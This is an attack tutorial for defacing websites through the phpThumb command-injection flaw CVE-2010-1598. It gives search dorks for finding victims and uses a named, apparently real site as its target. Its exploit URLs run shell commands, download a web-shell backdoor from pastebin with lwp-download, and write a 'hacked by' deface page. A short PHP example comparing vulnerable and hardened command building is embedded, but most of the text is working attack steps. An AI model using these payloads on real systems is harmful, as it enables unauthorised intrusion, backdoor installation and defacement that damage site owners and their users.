Tutorial - How to Deface via phpThumb Command Injection | RCE, Shell Upload

Keywords: How to deface phpThumb, CVE-2010-1598, How to deface CVE-2010-1598, Exploit CVE-2010-1598, Exploit phpThumb, phpThumb index deface

Dork:

inurl:/phpThumb/phpThumb.php

inurl:"/ibrowser/scripts/"

inurl:"/ibrowser/scripts/phpThumb/phpThumb.php"

inurl:/scripts/phpThumb/phpThumb.php

Demo:

http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php

Exploit (query string appended to phpThumb.php; the text after `blur|` is concatenated unescaped into the ImageMagick `convert` command line, so `;ls -la;` runs as a second shell command, and `phpThumbDebug=9` makes phpThumb print its debug log, including that command's output, at the bottom of the page):

?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la;&phpThumbDebug=9
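As an added illustration (this is not phpThumb's own code, and the function names are this example's own), the following PHP reproduces the pattern behind CVE-2010-1598 next to a hardened version: the `fltr[]` value `blur|<radius>` is split on `|` and the radius is concatenated into the ImageMagick `convert` command line, so the `;ls -la;` in the exploit above becomes a second shell command. The safe variant rejects any radius that is not a plain number and wraps every argument in `escapeshellarg()`. The sample filter string is the one from the exploit above.

```php
<?php
// Added example, not phpThumb's own code. It reproduces the shape of the
// CVE-2010-1598 bug: a filter value taken from the fltr[] query parameter
// is concatenated into an ImageMagick `convert` command line unescaped.
// buildBlurCommandVulnerable/buildBlurCommandSafe are this example's names.

// Vulnerable pattern: "blur|<radius>" is split on "|" and the radius is
// pasted straight into the shell command, so anything after the digits
// (including ";ls -la;") reaches /bin/sh as additional commands.
function buildBlurCommandVulnerable(string $filter, string $src, string $dst): string
{
    [$name, $parameter] = array_pad(explode('|', $filter, 2), 2, '');
    if (strcasecmp($name, 'blur') !== 0) {
        return '';
    }
    return 'convert ' . $src . ' -blur ' . $parameter . ' ' . $dst;
}

// Hardened version: the radius must be purely numeric, and every argument
// is passed through escapeshellarg() so shell metacharacters are inert.
function buildBlurCommandSafe(string $filter, string $src, string $dst): ?string
{
    [$name, $parameter] = array_pad(explode('|', $filter, 2), 2, '');
    if (strcasecmp($name, 'blur') !== 0) {
        return null;
    }
    // Accept only a plain radius such as "9" or "2.5"; reject everything else.
    if (!preg_match('/^\d+(\.\d+)?$/', $parameter)) {
        return null;
    }
    return 'convert ' . escapeshellarg($src)
        . ' -blur ' . escapeshellarg($parameter)
        . ' ' . escapeshellarg($dst);
}

// Constructed input: the fltr[] value from the exploit URL in this tutorial.
$filter = 'blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la;';

echo "Vulnerable: ", buildBlurCommandVulnerable($filter, 'file.jpg', 'out.jpg'), PHP_EOL;
echo "Safe (exploit string): ", var_export(buildBlurCommandSafe($filter, 'file.jpg', 'out.jpg'), true), PHP_EOL;
echo "Safe (plain radius):   ", var_export(buildBlurCommandSafe('blur|9', 'file.jpg', 'out.jpg'), true), PHP_EOL;
```

Running this with the php CLI shows the vulnerable builder emitting `convert file.jpg -blur 9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la; out.jpg`, which /bin/sh executes as `convert ...`, then `ls -la`, then a harmless failing `out.jpg`; that `ls -la` output is what phpThumbDebug=9 surfaces at the bottom of the page. The safe builder returns null for the same string and only produces a command for an input like `blur|9`.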

Tutorial:

  • Find a vulnerable target using the dorks above
  • Then append the exploit to the end of the phpThumb.php URL

Example:

http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la;&phpThumbDebug=9

  • Scroll to the bottom of the page: if the directory listing appears there, the command was executed and the target is vulnerable.

  • Then upload the Marijuana shell with this exploit (lwp-download, the Perl LWP command-line downloader, fetches the raw paste and writes it as nakanosec.php next to phpThumb.php, so it needs that tool on the target and a phpThumb directory writable by the web server user):

http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download https://pastebin.com/raw/tizUkMj9 nakanosec.php;&phpThumbDebug=9


  • To access the Marijuana shell backdoor:

https://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/nakanosec.php

Note: if the shell upload fails, you can still drop your deface page with the exploit below; the echo fallback does not depend on lwp-download being present, only on the phpThumb directory being writable by the web server user.

http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;echo "<center><h1>hacked by Anonymous Indonesia</h1>" > nakanosec.html;&phpThumbDebug=9

Access the deface page: https://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/nakanosec.html
